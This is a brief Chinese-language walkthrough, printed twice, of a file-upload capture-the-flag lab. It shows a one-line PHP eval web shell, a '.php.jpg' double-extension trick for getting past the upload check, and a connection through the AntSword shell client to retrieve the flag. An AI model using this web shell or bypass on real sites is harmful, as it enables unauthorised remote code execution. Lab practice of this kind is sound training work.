进入靶场
点击pass1
查看提示
既然是上传文件,先构造一句话木马,便于用蚁剑连接
<?php @eval($_POST[123])?>
上传木马
文件后缀写为.php.jpg
右键复制图片地址
打开蚁剑连接
先点击测试连接,显示成功后,再点击添加即可
直接在里面找flag即可
笔记
文件后缀写为php.jpg即可绕过检查又可建立连接
进入靶场
点击pass1
查看提示
既然是上传文件,先构造一句话木马,便于用蚁剑连接
<?php @eval($_POST[123])?>
上传木马
文件后缀写为.php.jpg
右键复制图片地址
打开蚁剑连接
先点击测试连接,显示成功后,再点击添加即可
直接在里面找flag即可
笔记
文件后缀写为php.jpg即可绕过检查又可建立连接
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2280471.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!